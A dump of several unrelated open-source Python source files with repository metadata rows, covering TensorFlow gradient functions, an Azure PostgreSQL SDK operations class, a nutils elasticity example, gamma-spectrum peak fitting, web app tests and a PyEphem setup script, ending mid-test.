grad_scale = math_ops.rsqrt(var_x + epsilon) * math_ops.reduce_sum(
grad_y * x_offset, axis=reduce_axis, keepdims=keepdims)
if data_format == b"NCHW":
grad_scale = array_ops.squeeze(grad_scale)
grad_offset = math_ops.reduce_sum(grad_y, axis=reduce_axis)
return math_ops.cast(grad_x, x_dtype), grad_scale, grad_offset
else:
if data_format == b"NHWC":
reduce_axis = [0, 1, 2]
else:
reduce_axis = [0, 2, 3]
shape = [1, array_ops.size(pop_mean), 1, 1]
pop_mean = array_ops.reshape(pop_mean, shape)
pop_var = array_ops.reshape(pop_var, shape)
scale = array_ops.reshape(scale, shape)
grad_offset = math_ops.reduce_sum(grad_y, axis=reduce_axis)
var_rsqrt = math_ops.rsqrt(pop_var + epsilon)
grad_scale = math_ops.reduce_sum(
grad_y * (x - pop_mean) * var_rsqrt, axis=reduce_axis)
grad_x = grad_y * scale * var_rsqrt
return math_ops.cast(grad_x, x_dtype), grad_scale, grad_offset
@ops.RegisterGradient("FusedBatchNormGrad")
def _FusedBatchNormGradGrad(op, *grad):
"""Returns the gradients for the 3 inputs of FusedBatchNormGrad.
Args:
op: The FusedBatchNormGradOp for which we need to compute gradients.
*grad: An argument list for tensors of gradients wrt the outputs with
grad[0] as grad_grad_x, grad[1] as grad_grad_scale, grad[2] as
grad_grad_offset.
Returns:
A tuple (grad_grad_y, grad_x, grad_scale, None, None), where grad_grad_y
is the gradient for grad_y, grad_x the gradient for x, grad_scale the
gradient for scale.
"""
data_format = op.get_attr("data_format")
epsilon = op.get_attr("epsilon")
is_training = op.get_attr("is_training")
grad_y = op.inputs[0]
x = op.inputs[1]
scale = op.inputs[2]
pop_mean = op.inputs[3]
pop_var = op.inputs[4]
grad_grad_x = grad[0]
grad_grad_scale = grad[1]
grad_grad_offset = grad[2]
with backprop.GradientTape() as tape:
tape.watch(grad_y)
tape.watch(x)
tape.watch(scale)
grad_x, grad_scale, grad_offset = _BatchNormGrad(
grad_y, x, scale, pop_mean, pop_var, epsilon, data_format, is_training)
grad_initial = [grad_grad_x, grad_grad_scale, grad_grad_offset]
grad_grad_y, grad_x, grad_scale = tape.gradient(
[grad_x, grad_scale, grad_offset], [grad_y, x, scale], grad_initial)
return grad_grad_y, grad_x, grad_scale, None, None
@ops.RegisterGradient("FusedBatchNormGradV2")
def _FusedBatchNormGradGradV2(op, *grad):
return _FusedBatchNormGradGrad(op, *grad)
@ops.RegisterGradient("L2Loss")
def _L2LossGrad(op, grad):
"""Return the gradients for L2Loss.
Args:
op: The L2LossOp for which we need to generate gradients.
grad: Tensor containing a single number.
Returns:
The gradient, which is (x * grad).
"""
return op.inputs[0] * grad
@ops.RegisterGradient("TopK")
@ops.RegisterGradient("TopKV2")
def _TopKGrad(op, grad, _):
"""Return the gradients for TopK.
Args:
op: The TopKOp for which we need to generate gradients.
grad: Tensor. The gradients passed to the TopKOp.
Returns:
A list of two tensors, the first being the gradient w.r.t to the input and
TopK, and the second being the gradient w.r.t. to the indices (all zero).
"""
in_shape = array_ops.shape(op.inputs[0])
ind_shape = array_ops.shape(op.outputs[1])
# int32 is not supported on GPU hence up-casting
ind_lastdim = array_ops.gather(
math_ops.cast(ind_shape, dtypes.int64),
array_ops.size(ind_shape) - 1)
# Flatten indices to 2D.
ind_2d = array_ops.reshape(op.outputs[1], array_ops.stack([-1, ind_lastdim]))
in_lastdim = array_ops.gather(
math_ops.cast(in_shape, dtypes.int64),
array_ops.size(in_shape) - 1)
outerdim = array_ops.shape(ind_2d)[0]
# Compute linear indices (flattened to 1D).
ind = array_ops.reshape(
ind_2d + math_ops.cast(
array_ops.expand_dims(
math_ops.range(0,
math_ops.cast(outerdim, dtypes.int64) * in_lastdim,
in_lastdim), -1), dtypes.int32), [-1])
# Substitute grad to appropriate locations and fill the rest with zeros,
# finally reshaping it to the original input shape.
return [
array_ops.reshape(
array_ops.scatter_nd(
array_ops.expand_dims(ind, -1), array_ops.reshape(grad, [-1]),
[math_ops.reduce_prod(in_shape)]), in_shape),
array_ops.zeros([], dtype=dtypes.int32)
]
@ops.RegisterGradient("NthElement")
def _NthElementGrad(op, grad):
"""Return the gradients for NthElement.
Args:
op: The NthElementOp for which we need to generate gradients.
grad: Tensor. The gradients passed to the NthElementOp
Returns:
A list of two tensors, the first being the gradient w.r.t. the input,
the second being the gradient w.r.t. the N (None).
"""
input = op.inputs[0] # pylint: disable=redefined-builtin
output = op.outputs[0]
# Compute the number of elements which equal to output in each reduction
# dimension. If there are multiple elements then the gradient will be
# divided between them.
indicators = math_ops.cast(
math_ops.equal(array_ops.expand_dims(output, -1), input), grad.dtype)
grad = array_ops.expand_dims(grad, -1)
num_selected = array_ops.expand_dims(math_ops.reduce_sum(indicators, -1), -1)
return [math_ops.div(indicators, num_selected) * grad, None]
| apache-2.0 | -4,054,416,086,370,532,000 | 32.772686 | 80 | 0.634361 | false |
Azure/azure-sdk-for-python | sdk/rdbms/azure-mgmt-rdbms/azure/mgmt/rdbms/postgresql/aio/operations/_private_link_resources_operations.py | 1 | 8766 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateLinkResourcesOperations:
"""PrivateLinkResourcesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.rdbms.postgresql.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_server(
self,
resource_group_name: str,
server_name: str,
**kwargs
) -> AsyncIterable["_models.PrivateLinkResourceListResult"]:
"""Gets the private link resources for PostgreSQL server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param server_name: The name of the server.
:type server_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PrivateLinkResourceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.rdbms.postgresql.models.PrivateLinkResourceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResourceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_server.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'serverName': self._serialize.url("server_name", server_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PrivateLinkResourceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_server.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBforPostgreSQL/servers/{serverName}/privateLinkResources'} # type: ignore
async def get(
self,
resource_group_name: str,
server_name: str,
group_name: str,
**kwargs
) -> "_models.PrivateLinkResource":
"""Gets a private link resource for PostgreSQL server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param server_name: The name of the server.
:type server_name: str
:param group_name: The name of the private link resource.
:type group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResource, or the result of cls(response)
:rtype: ~azure.mgmt.rdbms.postgresql.models.PrivateLinkResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'serverName': self._serialize.url("server_name", server_name, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBforPostgreSQL/servers/{serverName}/privateLinkResources/{groupName}'} # type: ignore
| mit | -1,868,626,017,380,395,800 | 48.247191 | 202 | 0.647616 | false |
nutils/nutils | examples/platewithhole.py | 1 | 5645 | #! /usr/bin/env python3
#
# In this script we solve the linear plane strain elasticity problem for an
# infinite plate with a circular hole under tension. We do this by placing the
# circle in the origin of a unit square, imposing symmetry conditions on the
# left and bottom, and Dirichlet conditions constraining the displacements to
# the analytical solution to the right and top. The traction-free circle is
# removed by means of the Finite Cell Method (FCM).
import nutils, numpy
# The main function defines the parameter space for the script. Configurable
# parameters are the mesh density (in number of elements along an edge),
# element type (square, triangle, or mixed), type of basis function (std or
# spline, with availability depending on element type), polynomial degree, far
# field traction, number of refinement levels for FCM, the cutout radius and
# Poisson's ratio.
def main(nelems: 'number of elementsa long edge' = 9,
etype: 'type of elements (square/triangle/mixed)' = 'square',
btype: 'type of basis function (std/spline)' = 'std',
degree: 'polynomial degree' = 2,
traction: "far field traction (relative to Young's modulus)" = .1,
maxrefine: 'maxrefine level for trimming' = 2,
radius: 'cut-out radius' = .5,
poisson: 'poisson ratio' = .3):
domain0, geom = nutils.mesh.unitsquare(nelems, etype)
domain = domain0.trim(nutils.function.norm2(geom) - radius, maxrefine=maxrefine)
ns = nutils.function.Namespace()
ns.x = geom
ns.lmbda = 2 * poisson
ns.mu = 1 - poisson
ns.ubasis = domain.basis(btype, degree=degree).vector(2)
ns.u_i = 'ubasis_ni ?lhs_n'
ns.X_i = 'x_i + u_i'
ns.strain_ij = '(u_i,j + u_j,i) / 2'
ns.stress_ij = 'lmbda strain_kk δ_ij + 2 mu strain_ij'
ns.r2 = 'x_k x_k'
ns.R2 = radius**2 / ns.r2
ns.k = (3-poisson) / (1+poisson) # plane stress parameter
ns.scale = traction * (1+poisson) / 2
ns.uexact_i = 'scale (x_i ((k + 1) (0.5 + R2) + (1 - R2) R2 (x_0^2 - 3 x_1^2) / r2) - 2 δ_i1 x_1 (1 + (k - 1 + R2) R2))'
ns.du_i = 'u_i - uexact_i'
sqr = domain.boundary['left,bottom'].integral('(u_i n_i)^2 d:x' @ ns, degree=degree*2)
sqr += domain.boundary['top,right'].integral('du_k du_k d:x' @ ns, degree=20)
cons = nutils.solver.optimize('lhs', sqr, droptol=1e-15)
res = domain.integral('ubasis_ni,j stress_ij d:x' @ ns, degree=degree*2)
lhs = nutils.solver.solve_linear('lhs', res, constrain=cons)
bezier = domain.sample('bezier', 5)
X, stressxx = bezier.eval(['X_i', 'stress_00'] @ ns, lhs=lhs)
nutils.export.triplot('stressxx.png', X, stressxx, tri=bezier.tri, hull=bezier.hull)
err = domain.integral('<du_k du_k, du_i,j du_i,j>_n d:x' @ ns, degree=max(degree,3)*2).eval(lhs=lhs)**.5
nutils.log.user('errors: L2={:.2e}, H1={:.2e}'.format(*err))
return err, cons, lhs
# If the script is executed (as opposed to imported), :func:`nutils.cli.run`
# calls the main function with arguments provided from the command line. For
# example, to keep with the default arguments simply run :sh:`python3
# platewithhole.py`. To select mixed elements and quadratic basis functions add
# :sh:`python3 platewithhole.py etype=mixed degree=2`.
if __name__ == '__main__':
nutils.cli.run(main)
# Once a simulation is developed and tested, it is good practice to save a few
# strategic return values for regression testing. The :mod:`nutils.testing`
# module, which builds on the standard :mod:`unittest` framework, facilitates
# this by providing :func:`nutils.testing.TestCase.assertAlmostEqual64` for the
# embedding of desired results as compressed base64 data.
class test(nutils.testing.TestCase):
@nutils.testing.requires('matplotlib')
def test_spline(self):
err, cons, lhs = main(nelems=4, etype='square', degree=2, btype='spline')
with self.subTest('l2-error'):
self.assertAlmostEqual(err[0], .00033, places=5)
with self.subTest('h1-error'):
self.assertAlmostEqual(err[1], .00671, places=5)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjaPC5XybfdX+dIkMDDP7TQ7ANDBFsayME+6nRUeMjxnON04zNjFWNYaL655B0nrNUgrFrzrHeh7Ff
n/sNt8v3/Nk7X66uuXT3wunzOecBJ0syCg==''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNoBjABz/6I2TN92H4rfriEeyuw05zGFLykv/i6UM6EzzjLEMUkxMDGlM58zLzOrMlMyOzKwM7EzfTM1
M/ky5TLFM8QznTNmMzYzJTPLNvjONM4/zi/OGclHzJfOSs45zjDOOSK7z5fPC8+cznzOBd/D3d3RFdAu
z+vO+yGg1bnSvdCoz03Pzdz01azS3dDLz2zPaQdIRw==''')
@nutils.testing.requires('matplotlib')
def test_mixed(self):
err, cons, lhs = main(nelems=4, etype='mixed', degree=2, btype='std')
with self.subTest('l2-error'):
self.assertAlmostEqual(err[0], .00024, places=5)
with self.subTest('h1-error'):
self.assertAlmostEqual(err[1], .00739, places=5)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjaGCAwx4pGMv/8UYZGFvrgagCkNZnaEgyYGjABw0NGRqOG+JXY23E0DDdCMTaaMzQcNT4iDGIPde4
CUz7G6cD6adGZsaqxvjNgUD9c0BbgTjkHEwk+jE2dTVA+Y3nTsmB2GYPsZv1CqhG6jyItePye8XLd69d
BbGXXZp0EUQ7Xrh7gaHB9/zp8znnAW7uYcc=''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNoNzcsrRGEYB2CxlbKY1CSXhUJxzvf+Co0FmlIWTCExdjaEBSuTSI0FiymRaxgrl9QsBgu2mqFc3vc7
5zCliGmQUaKkZCH+gKcnQaM4gI11rFaG3Gn1aJ6rAPlS0XzTGDG+zWOz/MFVlG1kGAGzx1yAF11YwBo2
oKmDMrFDcRVSLmqkeqXUvTpVmwhjALvYRhCF+KAydCJKQfoim1qpliK0RBEsI4o9xBHDOPz/exAG8uBD
L37oiapQghlp48/L2GUOu2WRp3mIT/iXa7iOW9jLGzzJ1WywhxX3cTvvy7Bc6RerO1VuhaVJ+vWbuOWC
S2VKZnmMkxzls4Ln2yynKrly3encWHHtsjx2rp4Xv3akQl65/1+4E2nn0Hkvdu4S10f2hLVlz1kRXaAb
9J3elWY5l0H5AxDbnCE=''')
| mit | -1,045,651,754,385,288,000 | 49.383929 | 122 | 0.717172 | false |
bearing/dosenet-analysis | D3S_analysis/spectra_fitting_tools.py | 1 | 9343 | import numpy as np
from scipy import optimize
from scipy import asarray as ar,exp
from scipy.integrate import quad
import matplotlib.pyplot as plt
verbose = 0
#--------------------------------------------------------------------------#
# Fit Functions
#--------------------------------------------------------------------------#
def lbound(bound,par):
return 1e4*np.sqrt(bound-par) + 1e-3*(bound-par) if (par<bound) else 0
def ubound(bound,par):
return 1e4*np.sqrt(par-bound) + 1e-3*(par-bound) if (par>bound) else 0
def bound(bounds,par):
return lbound(bounds[0],par) + ubound(bounds[1],par)
def fixed(fix,par):
return bound((fix,fix), par)
def gaus(x,a,x0,sigma):
return a*exp(-(x-x0)**2/(2*sigma**2))+lbound(0,a)+lbound(0,sigma)+lbound(0,x0)
def expo(x,a,slope):
return a*exp(x*slope)+lbound(0,a)+ubound(0,slope)
# p = [a1,mean,sigma,a2,shift,slope,const]
def gaus_plus_exp(x,p):
return gaus(x,p[0],p[1],p[2])+expo(x,p[3],p[4])
# p = [a1,mean,sigma,slope,const]
def gaus_plus_line(x,p):
return gaus(x,p[0],p[1],p[2])+p[3]*x+p[4]
def double_gaus_plus_exp(x,p):
return gaus(x,p[0],p[1],p[2])+gaus(x,p[3],p[4],p[5])+expo(x,p[6],p[7])
def double_gaus_plus_line(x,p):
return gaus(x,p[0],p[1],p[2])+gaus(x,p[3],p[4],p[5])+p[6]*x+p[7]
def peak_fitter(x,y,fit_function,pinit):
"""
Peak Finder for peak in specified range
Args:
x: data x values for fitting
y: data y values for fitting
fit_function: fit function
pinit: inital parameters for fit function
Returns:
array of resulting fit parameters and array of fit errors
"""
errfunc = lambda p, x, y: fit_function(x,p) - y
pfit,pcov,infodict,errmsg,success = \
optimize.leastsq(errfunc, pinit, args=(x,y), \
full_output=1, epsfcn=0.0001)
if (len(y) > len(pinit)) and pcov is not None:
s_sq = (errfunc(pfit, x, y)**2).sum()/(len(y)-len(pinit))
pcov = pcov * s_sq
else:
pcov = 0
error = []
for i in range(len(pfit)):
try:
error.append(np.absolute(pcov[i][i])**0.5)
except:
error.append( 0.00 )
pfit_leastsq = pfit
perr_leastsq = np.array(error)
return pfit_leastsq, perr_leastsq
def single_peak_fit(array,lower,upper,sigma,count_offset=1,make_plot=False,save_plot=False,plot_name=''):
"""
Performs single gaussian + exponential background fit
Args:
array: full array of counts (spectra)
lower,upper: bounds on spectra for window to fit inside
count_offset: correction for shift from left edge of spectrum
make_plot: flag for plotting fit result (diagnostic)
Returns:
list of fit parameters+errors
"""
points = ar(range(lower,upper))
count_list = list(array[lower:upper])
counts = ar(list(array[lower:upper]))
nentries = len(points)
mean = lower + (upper - lower)/2.0
max_value = max(count_list)
max_index = count_list.index(max_value)
if max_index > points[0]+20:
mean = max_index
max_counts = counts[0]
min_counts = counts[-1]
if min_counts == 0:
min_counts = 1
slope = (np.log(min_counts)-np.log(max_counts))/(points[-1]-points[0])
pinit = [counts[0],mean,sigma,counts[0]*count_offset,slope]
print('Initial parameters: {}'.format(pinit))
pars,errs = peak_fitter(points,counts,gaus_plus_exp,pinit)
print('Fit parameters: {}'.format(pars))
if make_plot:
fig = plt.figure()
fig.patch.set_facecolor('white')
plt.title('Spectra integrated over a day')
plt.xlabel('channels')
plt.ylabel('counts')
plt.xlim(lower,upper)
plt.ylim(counts[-1]*.1,counts[0]*10)
x = ar(range(0,len(array)))
plt.plot(points,array,'b:',label='data')
#pars = [ 2.95010675e+01, 1.06815654e+03, 6.94962149e+01, 3.89127957e+03, -4.64346847e-03]
plt.plot(points,gaus_plus_exp(points,pars),'ro:',label='fit')
plt.legend()
plt.yscale('log')
if save_plot:
#'/Users/alihanks/Google Drive/NQUAKE_analysis/D3S/fit_plots/'
fig_file = plot_name+'.pdf'
plt.savefig(fig_file)
plt.close()
if verbose:
par_labels = ['norm','mean','sigma','amp','slope']
for i in range(len(pars)):
print('{}-{}: {} +/- {}'.format(par_labels[i],counter,pars[i],errs[i]))
return [pars[1],errs[1]],[pars[2],errs[2]],[pars[0],errs[0]]
def double_peak_fit(array,counter,lower,upper,pindex=0,count_offset=1,make_plot=False,plot_name=''):
"""
Performs double gaussian + exponential background fit
Args:
array: full array of counts (spectra)
lower,upper: bounds on spectra for window to fit inside
pindex: indication of which gaussian to get fit results for
count_offset: correction for shift from left edge of spectrum
make_plot: flag for plotting fit result (diagnostic)
Returns:
list of fit parameters+errors
"""
points = ar(range(lower,upper))
counts = ar(list(array[lower:upper]))
nentries = len(points)
mean = lower + (upper - lower)/2.0
slope = (np.log(counts[-1])-np.log(counts[0]))/(points[-1]-points[0])
pinit = [counts[0]/7.0,mean-5.0,3.0,counts[0]/7.0,mean+5.0,3.0, \
counts[0]*count_offset,slope]
pars,errs = peak_fitter(points,counts,double_gaus_plus_exp,pinit)
if verbose:
par_labels = ['norm1','mean1','sigma1','norm2','mean2','sigma2','amp','slope']
for i in range(len(pars)):
print('{}-{}: {} +/- {}'.format(par_labels[i],counter,pars[i],errs[i]))
if make_plot:
fig = plt.figure()
fig.patch.set_facecolor('white')
plt.title('Spectra integrated over a day')
plt.xlabel('channels')
plt.ylabel('counts')
plt.xlim(lower,upper)
plt.ylim(20,1000)
x = ar(range(0,len(array)))
plt.plot(x,array,'b:',label='data')
plt.plot(x,double_gaus_plus_exp(x,pars),'ro:',label='fit')
plt.legend()
plt.yscale('log')
fig_file = '/Users/alihanks/Google Drive/NQUAKE_analysis/D3S/fit_plots/'+plot_name+'_fit_'+str(counter)+'.pdf'
plt.savefig(fig_file)
plt.close()
mean = [pars[1],errs[1]]
sigma = [pars[2],errs[2]]
amp = [pars[0],errs[0]]
if (pindex==1 and pars[4] > pars[1]) or (pindex==0 and pars[4] < pars[1]):
mean = [pars[4],errs[4]]
sigma = [pars[5],errs[5]]
amp = [pars[3],errs[3]]
if errs[1] > errs[4]:
mean[1] = errs[1]
if abs(pars[2]-pars[5])/pars[2] > 0.8:
mean[1] = 150
return mean,sigma,amp
def get_peak_counts(mean,sigma,amp):
count,err = quad(gaus,0,500,args=(amp,mean,sigma))
return count,err
def get_all_peak_counts(means,sigmas,amps):
'''
Calculate the area under a gaussian curve (estimate of counts in that peak)
Arguments:
- list of guassian means
- list of guassian widths
- list of gaussian amplitudes
Returns:
- list of counts from resulting gaussian integrations
'''
counts = []
for i in range(len(means)):
count,err = get_peak_counts(means[i],sigmas[i],amps[i])
counts.append(count)
return counts
def get_gross_counts(array,lower,upper):
counts = sum(array[lower:upper])
return counts
def get_peaks(rows, nhours, tstart, tstop, fit_function, fit_args):
'''
Applies double gaussian + expo fits to all data over some range of time
Arguments:
- full list of csv data input rows
- number of hours to integrate each calculation over
- start/stop times to run over
- peak fitting method
- arguments to be fed to the peak fitting method
Returns:
- lists of means,sigmas,amps from all gaussian fits
- each entry in list includes the value and uncertainty
'''
# print(rows)
datatz = rows[-1][1].tzinfo
date_itr = tstart
times = []
means = []
sigmas = []
amps = []
# break data up into days to speed up range selection
while date_itr < tstop:
next_day = date_itr+timedelta(days=1)
daily_row = [row for row in rows if \
inTimeRange(row[1],date_itr,next_day)]
time_itr = date_itr
date_itr = next_day
while time_itr < date_itr:
time_next = time_itr+timedelta(hours=nhours)
integration = [row for row in rows if \
inTimeRange(row[1],time_itr,time_next)]
time_itr = time_next
if len(integration)==0:
continue
array_lst = []
for j in integration:
array_lst.append(make_array(j))
integrated = sum(array_lst)
mean,sigma,amp = fit_function(integrated,*fit_args)
means.append(mean)
sigmas.append(sigma)
amps.append(amp)
times.append(integration[int(len(integration)/2)][1])
return times,means,sigmas,amps
| mit | -3,725,644,255,845,759,000 | 32.603704 | 118 | 0.569945 | false |
smurfix/pybble | test/test_app_run.py | 1 | 1520 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division, unicode_literals
##
## This is part of Pybble, a WMS (Whatever Management System) based on
## Jinja2/Haml, Werkzeug, Flask, and Optimism.
##
## Pybble is Copyright © 2009-2014 by Matthias Urlichs <[email protected]>,
## it is licensed under the GPLv3. See the file `README.md` for details,
## including an optimistic statements by the author.
##
## This paragraph is auto-generated and may self-destruct at any time,
## courtesy of "make update". The original is in ‘utils/_boilerplate.py’.
## Thus, please do not remove the next line, or insert any blank lines.
##BP
import pytest
from pybble.manager.main import RootManager
from pybble.core.models.site import Site
from .base import WebTC
from webunit.webunittest import WebTestCase
from .manager import run
def ap_test():
# set a class attribute on the invoking test context
run("mgr -Dt site add AppTest _test atest")
class AppRunTestCase(WebTC,WebTestCase):
# def setupData(self):
# super(AppRunTestCase,self).setupData()
# self.run_manager("mgr -Dt site new AppTest _test atest")
def test_one(self):
self.once(ap_test)
assert Site.q.get_by(name="AppTest").domain == "atest"
self.assertContent("http://atest/one","Number One")
def test_two(self):
self.once(ap_test)
self.assertContent("http://atest/two","Number Two")
def test_three(self):
self.once(ap_test)
self.assertContent("http://atest/three","Number Three")
| gpl-3.0 | 624,786,411,729,272,300 | 31.934783 | 82 | 0.728053 | false |
kev-ss/SSPT | ephem-3.7.6.0/setup.py | 1 | 2117 | import os
from distutils.core import setup, Extension
from glob import glob
# Read the current version from ephem/__init__.py itself.
path = os.path.join(os.path.dirname(__file__), 'ephem', '__init__.py')
for line in open(path):
if line.startswith('__version__'):
__version__ = eval(line.split(None, 2)[2]) # skip '__version__', '='
# The 'ephem' module is built from every .c file in the libastro
# directory plus ...
libastro_version = '3.7.6'
libastro_files = glob('libastro-%s/*.c' % libastro_version)
libastro_data = glob('extensions/data/*.c')
def read(*filenames):
return open(os.path.join(os.path.dirname(__file__), *filenames)).read()
extensions = [
Extension('ephem._libastro',
['extensions/_libastro.c', 'extensions/dtoa.c']
+ libastro_files + libastro_data,
include_dirs=['libastro-' + libastro_version],
),
]
setup(name = 'ephem',
version = __version__,
description = 'Compute positions of the planets and stars',
long_description = read('README.rst'),
license = 'LGPL',
author = 'Brandon Rhodes',
author_email = '[email protected]',
url = 'http://rhodesmill.org/pyephem/',
classifiers = [
'Development Status :: 6 - Mature',
'Intended Audience :: Science/Research',
'License :: OSI Approved ::'
' GNU Library or Lesser General Public License (LGPL)',
'Topic :: Scientific/Engineering :: Astronomy',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
packages = [ 'ephem', 'ephem.tests' ],
package_data = { 'ephem': ['doc/*.rst',
'tests/jpl/*.txt',
'tests/usno/*.txt',
],},
ext_modules = extensions,
)
| gpl-2.0 | 4,993,327,479,694,074,000 | 35.5 | 76 | 0.564006 | false |
Joergen/zamboni | mkt/abuse/tests/test_resources.py | 1 | 4447 | import json
import urllib
from django.core import mail
from django.core.urlresolvers import reverse
from nose.tools import eq_
from abuse.models import AbuseReport
from mkt.api.tests.test_oauth import RestOAuth
from mkt.api.tests.test_throttle import ThrottleTests
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from users.models import UserProfile
class BaseTestAbuseResource(ThrottleTests):
"""
Setup for AbuseResource tests that require inheritance from TestCase.
"""
resource_name = None
def setUp(self):
super(BaseTestAbuseResource, self).setUp()
self.list_url = reverse('%s-abuse-list' % (self.resource_name,))
self.headers = {
'REMOTE_ADDR': '48.151.623.42'
}
class AbuseResourceTests(object):
"""
Setup for AbuseResource tests that do not require inheritance from
TestCase.
Separate from BaseTestAbuseResource to ensure that test_* methods of this
abstract base class are not discovered by the runner.
"""
default_data = None
def _call(self, anonymous=False, data=None):
post_data = self.default_data.copy()
if data:
post_data.update(data)
client = self.anon if anonymous else self.client
res = client.post(self.list_url, data=urllib.urlencode(post_data),
content_type='application/x-www-form-urlencoded',
**self.headers)
try:
res_data = json.loads(res.content)
# Pending #855817, some errors will return an empty response body.
except ValueError:
res_data = res.content
return res, res_data
def _test_success(self, res, data):
"""
Tests common when looking to ensure complete successful responses.
"""
eq_(201, res.status_code)
fields = self.default_data.copy()
del fields['sprout']
if 'user' in fields:
eq_(data.pop('user')['display_name'], self.user.display_name)
del fields['user']
if 'app' in fields:
eq_(int(data.pop('app')['id']), self.app.pk)
del fields['app']
for name in fields.keys():
eq_(fields[name], data[name])
newest_report = AbuseReport.objects.order_by('-id')[0]
eq_(newest_report.message, data['text'])
eq_(len(mail.outbox), 1)
assert self.default_data['text'] in mail.outbox[0].body
def test_send(self):
res, data = self._call()
self._test_success(res, data)
assert 'display_name' in data['reporter']
def test_send_anonymous(self):
res, data = self._call(anonymous=True)
self._test_success(res, data)
eq_(data['reporter'], None)
def test_send_potato(self):
tuber_res, tuber_data = self._call(data={'tuber': 'potat-toh'},
anonymous=True)
